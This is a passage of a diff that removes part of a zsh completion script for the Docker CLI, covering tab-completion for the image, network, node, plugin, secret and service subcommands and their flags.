-                    if [[ ${words[(r)--kernel-memory*]} = (--kernel-memory*) ]]; then
-                        __docker_complete_stopped_containers && ret=0
-                    else
-                        __docker_complete_containers && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (wait)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:containers:__docker_complete_running_containers" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO container
-
-# BO image
-
-__docker_image_commands() {
-    local -a _docker_image_subcommands
-    _docker_image_subcommands=(
-        "build:Build an image from a Dockerfile"
-        "history:Show the history of an image"
-        "import:Import the contents from a tarball to create a filesystem image"
-        "inspect:Display detailed information on one or more images"
-        "load:Load an image from a tar archive or STDIN"
-        "ls:List images"
-        "prune:Remove unused images"
-        "pull:Pull an image or a repository from a registry"
-        "push:Push an image or a repository to a registry"
-        "rm:Remove one or more images"
-        "save:Save one or more images to a tar archive (streamed to STDOUT by default)"
-        "tag:Tag an image into a repository"
-    )
-    _describe -t docker-image-commands "docker image command" _docker_image_subcommands
-}
-
-__docker_image_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (build)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*--build-arg=[Build-time variables]:<varname>=<value>: " \
-                "($help)*--cache-from=[Images to consider as cache sources]: :__docker_complete_repositories_with_tags" \
-                "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" \
-                "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " \
-                "($help)--compress[Compress the build context using gzip]" \
-                "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " \
-                "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " \
-                "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " \
-                "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " \
-                "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " \
-                "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " \
-                "($help)--disable-content-trust[Skip image verification]" \
-                "($help -f --file)"{-f=,--file=}"[Name of the Dockerfile]:Dockerfile:_files" \
-                "($help)--force-rm[Always remove intermediate containers]" \
-                "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" \
-                "($help)*--label=[Set metadata for an image]:label=value: " \
-                "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " \
-                "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " \
-                "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" \
-                "($help)--no-cache[Do not use cache when building the image]" \
-                "($help)--pull[Attempt to pull a newer version of the image]" \
-                "($help -q --quiet)"{-q,--quiet}"[Suppress verbose build output]" \
-                "($help)--rm[Remove intermediate containers after a successful build]" \
-                "($help)*--shm-size=[Size of '/dev/shm' (format is '<number><unit>')]:shm size: " \
-                "($help -t --tag)*"{-t=,--tag=}"[Repository, name and tag for the image]: :__docker_complete_repositories_with_tags" \
-                "($help)*--ulimit=[ulimit options]:ulimit: " \
-                "($help)--userns=[Container user namespace]:user namespace:(host)" \
-                "($help -):path or URL:_directories" && ret=0
-            ;;
-        (history)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -H --human)"{-H,--human}"[Print sizes and dates in human readable format]" \
-                "($help)--no-trunc[Do not truncate output]" \
-                "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \
-                "($help -)*: :__docker_complete_images" && ret=0
-            ;;
-        (import)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \
-                "($help -m --message)"{-m=,--message=}"[Commit message for imported image]:message: " \
-                "($help -):URL:(- http:// file://)" \
-                "($help -): :__docker_complete_repositories_with_tags" && ret=0
-            ;;
-        (inspect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
-                "($help -)*:images:__docker_complete_images" && ret=0
-            ;;
-        (load)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -i --input)"{-i=,--input=}"[Read from tar archive file]:archive file:_files -g \"*.((tar|TAR)(.gz|.GZ|.Z|.bz2|.lzma|.xz|)|(tbz|tgz|txz))(-.)\"" \
-                "($help -q --quiet)"{-q,--quiet}"[Suppress the load output]" && ret=0
-            ;;
-        (ls|list)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all)"{-a,--all}"[Show all images]" \
-                "($help)--digests[Show digests]" \
-                "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \
-                "($help)--format=[Pretty-print images using a Go template]:template: " \
-                "($help)--no-trunc[Do not truncate output]" \
-                "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \
-                "($help -): :__docker_complete_repositories" && ret=0
-            case $state in
-                (filter-options)
-                    __docker_complete_images_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (prune)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all)"{-a,--all}"[Remove all unused images, not just dangling ones]" \
-                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
-                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
-            ;;
-        (pull)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all-tags)"{-a,--all-tags}"[Download all tagged images]" \
-                "($help)--disable-content-trust[Skip image verification]" \
-                "($help -):name:__docker_search" && ret=0
-            ;;
-        (push)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--disable-content-trust[Skip image signing]" \
-                "($help -): :__docker_complete_images" && ret=0
-            ;;
-        (rm)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --force)"{-f,--force}"[Force removal]" \
-                "($help)--no-prune[Do not delete untagged parents]" \
-                "($help -)*: :__docker_complete_images" && ret=0
-            ;;
-        (save)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -o --output)"{-o=,--output=}"[Write to file]:file:_files" \
-                "($help -)*: :__docker_complete_images" && ret=0
-            ;;
-        (tag)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -):source:__docker_complete_images"\
-                "($help -):destination:__docker_complete_repositories_with_tags" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO image
-
-# BO network
-
-__docker_network_complete_ls_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (driver)
-                __docker_complete_info_plugins Network && ret=0
-                ;;
-            (id)
-                __docker_complete_networks_ids && ret=0
-                ;;
-            (name)
-                __docker_complete_networks_names && ret=0
-                ;;
-            (type)
-                type_opts=('builtin' 'custom')
-                _describe -t type-filter-opts "Type Filter Options" type_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('driver' 'id' 'label' 'name' 'type')
-        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_get_networks() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local line s
-    declare -a lines networks
-
-    type=$1; shift
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options network ls)"$'\n'}})
-
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1
-    lines=(${lines[2,-1]})
-
-    # Network ID
-    if [[ $type = (ids|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[NETWORK ID]},${end[NETWORK ID]}]%% ##}"
-            s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}"
-            s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}"
-            networks=($networks $s)
-        done
-    fi
-
-    # Names
-    if [[ $type = (names|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
-            s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}"
-            s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}"
-            networks=($networks $s)
-        done
-    fi
-
-    _describe -t networks-list "networks" networks "$@" && ret=0
-    return ret
-}
-
-__docker_complete_networks() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_networks all "$@"
-}
-
-__docker_complete_networks_ids() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_networks ids "$@"
-}
-
-__docker_complete_networks_names() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_get_networks names "$@"
-}
-
-__docker_network_commands() {
-    local -a _docker_network_subcommands
-    _docker_network_subcommands=(
-        "connect:Connect a container to a network"
-        "create:Creates a new network with a name specified by the user"
-        "disconnect:Disconnects a container from a network"
-        "inspect:Displays detailed information on a network"
-        "ls:Lists all the networks created by the user"
-        "prune:Remove all unused networks"
-        "rm:Deletes one or more networks"
-    )
-    _describe -t docker-network-commands "docker network command" _docker_network_subcommands
-}
-
-__docker_network_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (connect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*--alias=[Add network-scoped alias for the container]:alias: " \
-                "($help)--ip=[Container IPv4 address]:IPv4: " \
-                "($help)--ip6=[Container IPv6 address]:IPv6: " \
-                "($help)*--link=[Add a link to another container]:link:->link" \
-                "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " \
-                "($help -)1:network:__docker_complete_networks" \
-                "($help -)2:containers:__docker_complete_containers" && ret=0
-
-            case $state in
-                (link)
-                    if compset -P "*:"; then
-                        _wanted alias expl "Alias" compadd -E "" && ret=0
-                    else
-                        __docker_complete_running_containers -qS ":" && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (create)
-            _arguments $(__docker_arguments) -A '-*' \
-                $opts_help \
-                "($help)--attachable[Enable manual container attachment]" \
-                "($help)*--aux-address[Auxiliary IPv4 or IPv6 addresses used by network driver]:key=IP: " \
-                "($help -d --driver)"{-d=,--driver=}"[Driver to manage the Network]:driver:(null host bridge overlay)" \
-                "($help)*--gateway=[IPv4 or IPv6 Gateway for the master subnet]:IP: " \
-                "($help)--internal[Restricts external access to the network]" \
-                "($help)*--ip-range=[Allocate container ip from a sub-range]:IP/mask: " \
-                "($help)--ipam-driver=[IP Address Management Driver]:driver:(default)" \
-                "($help)*--ipam-opt=[Custom IPAM plugin options]:opt=value: " \
-                "($help)--ipv6[Enable IPv6 networking]" \
-                "($help)*--label=[Set metadata on a network]:label=value: " \
-                "($help)*"{-o=,--opt=}"[Driver specific options]:opt=value: " \
-                "($help)*--subnet=[Subnet in CIDR format that represents a network segment]:IP/mask: " \
-                "($help -)1:Network Name: " && ret=0
-            ;;
-        (disconnect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)1:network:__docker_complete_networks" \
-                "($help -)2:containers:__docker_complete_containers" && ret=0
-            ;;
-        (inspect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
-                "($help -)*:network:__docker_complete_networks" && ret=0
-            ;;
-        (ls)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--no-trunc[Do not truncate the output]" \
-                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
-                "($help)--format=[Pretty-print networks using a Go template]:template: " \
-                "($help -q --quiet)"{-q,--quiet}"[Only display numeric IDs]" && ret=0
-            case $state in
-                (filter-options)
-                    __docker_network_complete_ls_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (prune)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
-                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
-            ;;
-        (rm)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:network:__docker_complete_networks" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO network
-
-# BO node
-
-__docker_node_complete_ls_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (id)
-                __docker_complete_nodes_ids && ret=0
-                ;;
-            (membership)
-                membership_opts=('accepted' 'pending' 'rejected')
-                _describe -t membership-opts "membership options" membership_opts && ret=0
-                ;;
-            (name)
-                __docker_complete_nodes_names && ret=0
-                ;;
-            (role)
-                role_opts=('manager' 'worker')
-                _describe -t role-opts "role options" role_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('id' 'label' 'membership' 'name' 'role')
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_node_complete_ps_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (desired-state)
-                state_opts=('accepted' 'running')
-                _describe -t state-opts "desired state options" state_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('desired-state' 'id' 'label' 'name')
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_nodes() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local line s
-    declare -a lines nodes args
-
-    type=$1; shift
-    filter=$1; shift
-    [[ $filter != "none" ]] && args=("-f $filter")
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options node ls $args)"$'\n'}})
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1
-    lines=(${lines[2,-1]})
-
-    # Node ID
-    if [[ $type = (ids|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[ID]},${end[ID]}]%% ##}"
-            nodes=($nodes $s)
-        done
-    fi
-
-    # Names
-    if [[ $type = (names|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
-            nodes=($nodes $s)
-        done
-    fi
-
-    _describe -t nodes-list "nodes" nodes "$@" && ret=0
-    return ret
-}
-
-__docker_complete_nodes() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_nodes all none "$@"
-}
-
-__docker_complete_nodes_ids() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_nodes ids none "$@"
-}
-
-__docker_complete_nodes_names() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_nodes names none "$@"
-}
-
-__docker_complete_pending_nodes() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_nodes all "membership=pending" "$@"
-}
-
-__docker_complete_manager_nodes() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_nodes all "role=manager" "$@"
-}
-
-__docker_complete_worker_nodes() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_nodes all "role=worker" "$@"
-}
-
-__docker_node_commands() {
-    local -a _docker_node_subcommands
-    _docker_node_subcommands=(
-        "demote:Demote a node as manager in the swarm"
-        "inspect:Display detailed information on one or more nodes"
-        "ls:List nodes in the swarm"
-        "promote:Promote a node as manager in the swarm"
-        "rm:Remove one or more nodes from the swarm"
-        "ps:List tasks running on one or more nodes, defaults to current node"
-        "update:Update a node"
-    )
-    _describe -t docker-node-commands "docker node command" _docker_node_subcommands
-}
-
-__docker_node_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (rm|remove)
-             _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --force)"{-f,--force}"[Force remove a node from the swarm]" \
-                "($help -)*:node:__docker_complete_pending_nodes" && ret=0
-            ;;
-        (demote)
-             _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:node:__docker_complete_manager_nodes" && ret=0
-            ;;
-        (inspect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
-                "($help)--pretty[Print the information in a human friendly format]" \
-                "($help -)*:node:__docker_complete_nodes" && ret=0
-            ;;
-        (ls|list)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
-                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0
-            case $state in
-                (filter-options)
-                    __docker_node_complete_ls_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (promote)
-             _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:node:__docker_complete_worker_nodes" && ret=0
-            ;;
-        (ps)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all)"{-a,--all}"[Display all instances]" \
-                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
-                "($help)--no-resolve[Do not map IDs to Names]" \
-                "($help)--no-trunc[Do not truncate output]" \
-                "($help -)*:node:__docker_complete_nodes" && ret=0
-            case $state in
-                (filter-options)
-                    __docker_node_complete_ps_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (update)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--availability=[Availability of the node]:availability:(active pause drain)" \
-                "($help)*--label-add=[Add or update a node label]:key=value: " \
-                "($help)*--label-rm=[Remove a node label if exists]:label: " \
-                "($help)--role=[Role of the node]:role:(manager worker)" \
-                "($help -)1:node:__docker_complete_nodes" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_node_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO node
-
-# BO plugin
-
-__docker_complete_plugins() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local line s
-    declare -a lines plugins
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options plugin ls)"$'\n'}})
-
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1
-    lines=(${lines[2,-1]})
-
-    # Name
-    for line in $lines; do
-        s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
-        s="$s:${(l:7:: :::)${${line[${begin[TAG]},${end[TAG]}]}%% ##}}"
-        plugins=($plugins $s)
-    done
-
-    _describe -t plugins-list "plugins" plugins "$@" && ret=0
-    return ret
-}
-
-__docker_plugin_commands() {
-    local -a _docker_plugin_subcommands
-    _docker_plugin_subcommands=(
-        "disable:Disable a plugin"
-        "enable:Enable a plugin"
-        "inspect:Return low-level information about a plugin"
-        "install:Install a plugin"
-        "ls:List plugins"
-        "push:Push a plugin"
-        "rm:Remove a plugin"
-        "set:Change settings for a plugin"
-    )
-    _describe -t docker-plugin-commands "docker plugin command" _docker_plugin_subcommands
-}
-
-__docker_plugin_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (disable|enable|inspect|ls|push|rm)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)1:plugin:__docker_complete_plugins" && ret=0
-            ;;
-        (install)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--alias=[Local name for plugin]:alias: " \
-                "($help -)1:plugin:__docker_complete_plugins" && ret=0
-            ;;
-        (set)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)1:plugin:__docker_complete_plugins" \
-                "($help-)*:key=value: " && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_plugin_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO plugin
-
-# BO secret
-
-__docker_secrets() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local line s
-    declare -a lines secrets
-
-    type=$1; shift
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options secret ls)"$'\n'}})
-
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1
-    lines=(${lines[2,-1]})
-
-    # ID
-    if [[ $type = (ids|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[ID]},${end[ID]}]%% ##}"
-            secrets=($secrets $s)
-        done
-    fi
-
-    # Names
-    if [[ $type = (names|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
-            secrets=($secrets $s)
-        done
-    fi
-
-    _describe -t secrets-list "secrets" secrets "$@" && ret=0
-    return ret
-}
-
-__docker_complete_secrets() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_secrets all "$@"
-}
-
-__docker_secret_commands() {
-    local -a _docker_secret_subcommands
-    _docker_secret_subcommands=(
-        "create:Create a secret using stdin as content"
-        "inspect:Display detailed information on one or more secrets"
-        "ls:List secrets"
-        "rm:Remove one or more secrets"
-    )
-    _describe -t docker-secret-commands "docker secret command" _docker_secret_subcommands
-}
-
-__docker_secret_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (create)
-            _arguments $(__docker_arguments) -A '-*' \
-                $opts_help \
-                "($help)*"{-l=,--label=}"[Secret labels]:label: " \
-                "($help -):secret: " && ret=0
-            ;;
-        (inspect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given Go template]:template: " \
-                "($help -)*:secret:__docker_complete_secrets" && ret=0
-            ;;
-        (ls|list)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0
-            ;;
-        (rm|remove)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:secret:__docker_complete_secrets" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_secret_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO secret
-
-# BO service
-
-__docker_service_complete_ls_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (id)
-                __docker_complete_services_ids && ret=0
-                ;;
-            (name)
-                __docker_complete_services_names && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('id' 'label' 'name')
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_service_complete_ps_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (desired-state)
-                state_opts=('accepted' 'running')
-                _describe -t state-opts "desired state options" state_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('desired-state' 'id' 'label' 'name')
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_services() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local line s
-    declare -a lines services
-
-    type=$1; shift
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options service ls)"$'\n'}})
-
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1
-    lines=(${lines[2,-1]})
-
-    # Service ID
-    if [[ $type = (ids|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[ID]},${end[ID]}]%% ##}"
-            s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}"
-            services=($services $s)
-        done
-    fi
-
-    # Names
-    if [[ $type = (names|all) ]]; then
-        for line in $lines; do
-            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
-            s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}"
-            services=($services $s)
-        done
-    fi
-
-    _describe -t services-list "services" services "$@" && ret=0
-    return ret
-}
-
-__docker_complete_services() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_services all "$@"
-}
-
-__docker_complete_services_ids() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_services ids "$@"
-}
-
-__docker_complete_services_names() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_services names "$@"
-}
-
-__docker_service_commands() {
-    local -a _docker_service_subcommands
-    _docker_service_subcommands=(
-        "create:Create a new service"
-        "inspect:Display detailed information on one or more services"
-        "ls:List services"
-        "rm:Remove one or more services"
-        "scale:Scale one or multiple replicated services"
-        "ps:List the tasks of a service"
-        "update:Update a service"
-    )
-    _describe -t docker-service-commands "docker service command" _docker_service_subcommands
-}
-
-__docker_service_subcommand() {
-    local -a _command_args opts_help opts_create_update
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-    opts_create_update=(
-        "($help)*--constraint=[Placement constraints]:constraint: "
-        "($help)--endpoint-mode=[Placement constraints]:mode:(dnsrr vip)"
-        "($help)*"{-e=,--env=}"[Set environment variables]:env: "
-        "($help)--health-cmd=[Command to run to check health]:command: "
-        "($help)--health-interval=[Time between running the check]:time: "
-        "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)"
-        "($help)--health-timeout=[Maximum time to allow one check to run]:time: "
-        "($help)--hostname=[Service container hostname]:hostname: " \
-        "($help)*--label=[Service labels]:label: "
-        "($help)--limit-cpu=[Limit CPUs]:value: "
-        "($help)--limit-memory=[Limit Memory]:value: "
-        "($help)--log-driver=[Logging driver for service]:logging driver:__docker_complete_log_drivers"
-        "($help)*--log-opt=[Logging driver options]:log driver options:__docker_complete_log_options"
-        "($help)*--mount=[Attach a filesystem mount to the service]:mount: "
-        "($help)*--network=[Network attachments]:network: "
-        "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]"
-        "($help)*"{-p=,--publish=}"[Publish a port as a node port]:port: "
-        "($help)--replicas=[Number of tasks]:replicas: "
-        "($help)--reserve-cpu=[Reserve CPUs]:value: "
-        "($help)--reserve-memory=[Reserve Memory]:value: "
-        "($help)--restart-condition=[Restart when condition is met]:mode:(any none on-failure)"
-        "($help)--restart-delay=[Delay between restart attempts]:delay: "
-        "($help)--restart-max-attempts=[Maximum number of restarts before giving up]:max-attempts: "
-        "($help)--restart-window=[Window used to evaluate the restart policy]:window: "
-        "($help)*--secret=[Specify secrets to expose to the service]:secret:__docker_complete_secrets"
-        "($help)--stop-grace-period=[Time to wait before force killing a container]:grace period: "
-        "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-TTY]"
-        "($help)--update-delay=[Delay between updates]:delay: "
-        "($help)--update-failure-action=[Action on update failure]:mode:(pause continue)"
-        "($help)--update-max-failure-ratio=[Failure rate to tolerate during an update]:fraction: "
-        "($help)--update-monitor=[Duration after each task update to monitor for failure]:window: "
-        "($help)--update-parallelism=[Maximum number of tasks updated simultaneously]:number: "
-        "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users"
-        "($help)--with-registry-auth[Send registry authentication details to swarm agents]"
